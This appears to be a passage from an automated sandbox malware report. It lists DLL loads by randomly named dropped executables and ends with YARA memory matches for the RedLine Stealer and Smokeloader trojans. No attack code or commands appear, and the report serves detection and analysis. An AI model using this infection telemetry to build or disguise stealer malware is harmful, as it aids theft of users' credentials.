                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: riched20.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: usp10.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: msls31.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: explorerframe.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sfc.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpSection loaded: sfc_os.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: appxsip.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: opcservices.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcr100.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: mozglue.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: wsock32.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: msvcp140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeSection loaded: linkinfo.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wtsapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wkscli.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: cscapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: winsta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: colorui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: mscms.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coloradapterclient.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: compstui.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: inetres.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: appxsip.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: opcservices.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: shfolder.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: rstrtmgr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: msacm32.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: winmmbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: riched20.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: usp10.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: msls31.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpSection loaded: sspicli.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: dwmapi.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: oleacc.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: shfolder.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: version.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: msimg32.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: secur32.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: dbghelp.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: wininet.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: winmm.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeSection loaded: sspicli.dll
Source: 00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
